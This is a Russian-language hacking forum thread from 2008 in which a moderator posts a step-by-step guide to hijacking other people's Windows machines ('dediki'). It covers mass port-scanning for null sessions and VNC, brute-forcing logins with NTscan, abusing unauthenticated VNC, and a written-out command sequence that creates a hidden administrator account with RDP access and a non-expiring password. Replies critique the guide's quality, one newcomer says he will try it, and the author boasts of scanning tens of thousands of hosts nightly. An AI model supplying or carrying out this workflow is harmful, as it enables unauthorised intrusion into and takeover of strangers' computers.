ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.04.2008, 10:19
|
|
Moderator - Level 7
Регистрация: 11.01.2008
Сообщений: 263
Провел на форуме:
2031719
Репутация:
159
|
|
Добудем дедик
Добудем дедик
и так приступим .....
Мы будем искать деды на открытые порты 139,135 - null session и 5900 - VNC.
Можно использовать множество сканеров но я предпочитаю angry ip scanner качаем его Angry
чтобы было удобно юзать данный сканер создаём баник *.bat файлег с диапазонами в виде
Код:
ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt
отсюда видно что запускается наш сканер ipscan.exe сканирует диапазон от 192.168.0.1 до 192.168.2.2 и сохраняет результат в 192.168.0.1_192.168.2.2.txt
Чтобы не мучатся с вбивом диапазонов так как их может быть 400-500 а то и более был написан парсер для этого качаем парсер Parser
закидываем в парсер диапазоны в виде 192.168.0.1 192.168.2.2 он нам выдаст их в виде ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt
диапазоны по странам можно смотреть тут Ip rang
теперь настраиваем наш сканер на скан портов 139,135,5900 и запускаем наш сканер и идем пить кофе ну или лучше поспать 
после скана одного диапазона создастся файлег в папке с сканером под названием ip от-до.txt(192.168.0.1_192.168.2.2.txt) если вы будете сканить 500 диапазонов то в папке со сканером будет 500 файликов
Для удобства парсинга результатов angry был написан еще 1 парсер качаем его Parser 2
закидываем в него все результаты от скана он нам разделит ипы на 3 столбца 139 135 5900
И так для брута дедов с открытой null session(139,135) я использую NTscan качаем его NTscan
думаю все разберутся как его юзать.
а так же для массавого чека VNC (5900) дедов используем VNCmasss качаем его VNCmass
VNCmasss позволит приконектится к бажному VNC деду без авторизации .
Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389 про такой дед лучше забыть,а если открыт данный порт на дедике и мы зашли на дед то быстренько создаем учетку
cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
заходм под свеже созданной учеткой и наслаждаемся добытым Дедиком
в случае если вы вошли на дед через бажный VNC то так же проверяем открыт ли порт 3389 если порт открыт по такому же примеру приведенному выше создаём учетку
Если RDP закрыт то на такой дед можно забить.Бажные Vnc Восновном на XP и толку от таких дедов мало.
Удачного всем брута и скана
Спасибо за внимание .
Последний раз редактировалось Realix; 04.07.2008 в 07:26..
|
|
|
25.04.2008, 11:56
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
1. Почему в качестве примера везде диапазон локальных адресов?
2. Ну бажный VNC может встретится, а что делать с найденым RDP
3. Можно ещё поискать другие сервисы удалённого администрирования, например Радмин, почему только два?
Резюме:
1. Боян.
2. Тема с@с@к нераскрыта
Вердикт: скорее всего delete (ели не будет дополнений и раскрытия темы)
Последний раз редактировалось -=lebed=-; 25.04.2008 в 12:39..
|
|
|
|
25.04.2008, 12:05
|
|
Шелдон Купер
Регистрация: 18.08.2007
Сообщений: 396
Провел на форуме:
5284363
Репутация:
882
|
|
ну да... стать так себе, тема не раскрыта, протсо описание что да как. Таких "статей" в нете как... кароч пусть модеры решают.
|
|
|
|
17.05.2008, 16:53
|
|
Познающий
Регистрация: 05.06.2007
Сообщений: 56
Провел на форуме:
538506
Репутация:
28
|
|
Описаны конкретные действия, думать ничего не нужно, я благодарен, буду пробовать, я новичок и все понял |
|
|
|
17.05.2008, 17:01
|
|
Постоянный
Регистрация: 08.10.2006
Сообщений: 445
Провел на форуме:
1028732
Репутация:
80
|
|
как же это старо, бажных дедиколв таких уже почти нет
|
|
|
|
17.05.2008, 17:02
|
|
Постоянный
Регистрация: 31.08.2007
Сообщений: 571
Провел на форуме:
1847821
Репутация:
953
|
|
многие кто рассуждает о дедах, имеют смутное понятие о них вообще!
|
|
|
|
18.05.2008, 17:21
|
|
Moderator - Level 7
Регистрация: 11.01.2008
Сообщений: 263
Провел на форуме:
2031719
Репутация:
159
|
|
Сообщение от Ali_MiX
как же это старо, бажных дедиколв таких уже почти нет
Зря ты так говоришь я за ночь более 30 к насканиваю
ЗЫ нуль ссесия это не баг для очень умных 
Сообщение от ртуть
многие кто рассуждает о дедах, имеют смутное понятие о них вообще!
Ет ты о чем
Последний раз редактировалось Realix; 18.05.2008 в 17:26..
|
|
|
|
18.05.2008, 22:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
И так для брута дедов с открытой null session(139,135) я использую NTscan
Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389
брутом дедов никогда не занимался, НО не логичнее ли будет для 139 и 135 СНАЧАЛА проверить открытость порта 3389 при помощи того же ipscan.exe, а уже потом брутить, штобы не далать пустую работу ?
|
|
|
|
18.05.2008, 22:49
|
|
Познающий
Регистрация: 10.06.2007
Сообщений: 63
Провел на форуме:
324710
Репутация:
40
|
|
кто бы че реальное подкинул, а не копипастенные измененные идейки...=\
|
|
|
|
18.05.2008, 23:17
|
|
Постоянный
Регистрация: 08.10.2006
Сообщений: 445
Провел на форуме:
1028732
Репутация:
80
|
|
на http://forum.xeka.ru/ эта тема была
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
